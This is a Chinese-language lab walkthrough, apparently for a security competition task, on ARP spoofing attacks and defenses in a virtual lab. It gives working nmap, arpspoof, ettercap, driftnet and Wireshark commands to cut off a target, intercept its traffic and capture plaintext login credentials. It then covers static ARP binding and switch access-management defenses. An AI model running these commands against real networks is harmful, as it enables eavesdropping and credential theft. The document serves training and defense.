ARP协议安全攻防
【参见公开试题1“系统安全攻防及运维安全管控部分(200分)”部分之任务3:ARP协议安全攻防】
一、设备
1.PC机
Windows 10
VMware Workstation 12 Pro
虚拟机Windows 7
虚拟机Kali1.09
2.无线路由器(能访问Internet)
二、环境
1.目标机
虚拟机Windows 7 64x(64位旗舰版)
IP:192.168.0.209 MAC:00-0C-29-78-AD-F9
IE浏览器
2.攻击机
虚拟机Kali1.09
ip:192.168.0.201 mac:00:0c:29:25:37:8e
nmap,arpspoof,ettercap,driftnet,wireshark
3.无线路由器
网关
IP:192.168.0.1 MAC:b4-0f-3b-99-b1-aa
4.虚拟机Kali Linux所用工具
nmap
arpspoof
ettercap
driftnet(可选)
wireshark
5.Windows所用工具
命令提示符
arp -a
arp -s
arp -d
ipconfig /all
ping
三、任务内容
1.获取目标机Win 7虚拟机的IP和MAC地址
C:UsersAdministrator>ipconfig /all
物理地址(MAC地址):00-0C-29-78-AD-F9
IPv4地址:192.168.0.209(首选)
子网掩码:255.255.255.0
默认网关:192.168.0.1
DNS服务器:192.168.0.1
2.获取攻击机Kali虚拟机的ip和mac地址
root@kali:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:25:37:8e
inet addr:192.168.0.201 Bcast:192.168.0.255 Mask:255.255.255.0
......
3.nmap扫描
root@kali:~# nmap -sP 192.168.0.0/24
//扫描本网段192.168.0.0/24,获取目标机的IP:192.168.0.209和MAC:00-0C-29-78-AD-F9
root@kali:~# nmap -O 192.168.0.209
//获取目标机的操作系统信息
4.断网测试
root@kali:~# arpspoof -h
Usage: arpspoof [-i interface] [-t target] host
root@kali:~# arpspoof -i 网卡 -t 目标ip 网关
root@kali:~# arpspoof -i eth0 -t 192.168.0.209 192.168.0.1
原来的Windows 7虚拟机可以上网,现在不能了
Ctrl+Z停止
5.毒化
(1)开启ip流量转发
root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1
(2)ARP欺骗攻击
数据重定向,使网关的数据重定向到攻击者的机器,流量由网关到攻击者再到受攻击者)
使用arpspoof/ettercap,选一个进行arp欺骗,获取从192.168.0.1(网关)到192.168.0.209(目标机)的流量
root@kali:~# arpspoof -i eth0 -t 192.168.0.1 192.168.0.209
(3)打开另一个终端,进行ARP中间人渗透测试
root@kali:~# ettercap -T -q -M ARP /192.168.0.209// ///
或
root@kali:~# ettercap -Tq -i eth0
6.打开另一个终端,使用driftnet进行流量监控,显示图片,见图“2.ARP协议安全攻防1.png”
root@kali:~# driftnet -i eth0
//在目标机上用IE浏览器通过无线路由器访问外网(本实例访问http://www.wgxy.net),浏览有图片的网页

7.打开另一个终端,使用wireshark进行抓包,获取用户名和密码
root@kali:~# wireshark
//过滤规则:ip.src == 192.168.0.209 && http
//在目标机上用IE浏览器访问HTTP登录页面(用户名、密码)
//分析包中的用户名和密码(明文),见图“2.ARP协议安全攻防2.png”
8.ARP欺骗的防护
(1)静态绑定
最常用的方法就是做IP和MAC静态绑定,在网内把主机和网关都做IP和MAC绑定。
arp -s <IP地址> <MAC地址>
(2)使用ARP防护软件
目前关于ARP类的防护软件比较多,使用比较常用的ARP工具主要是欣向ARP工具、Antiarp等
(3)AM
在神州数码交换机上配置AM,阻止kali虚拟机发起ARPSpoofing渗透测试
基本配置如下:
#全局打开AM功能
Switch(config)#am enable
#端口 1/1开启AM功能,绑定IP、MAC
Switch(config)#interface ethernet 1/1
Switch(config-If-Ethernet 1/1)#am port
Switch(config-If-Ethernet 1/1)#am mac-ip-pool 00-0C-29-78-AD-F9 192.168.0.209
【参见】
1.“DCN交换机简明配置手册v2.1.chm”中的“7.端口功能配置→2.端口扩展功能配置→01.端口IP、MAC绑定功能”】
2.https://wenku.baidu.com/view/055f0b07e87101f69e31951e.html
AM功能:AM(Access Management)访问管理,它利用收到数据报文的信息(源IP地址或源IP地址+MAC地址)与配置硬件地址池(AM pool)相比较,如果找到则转发,否则丢弃。

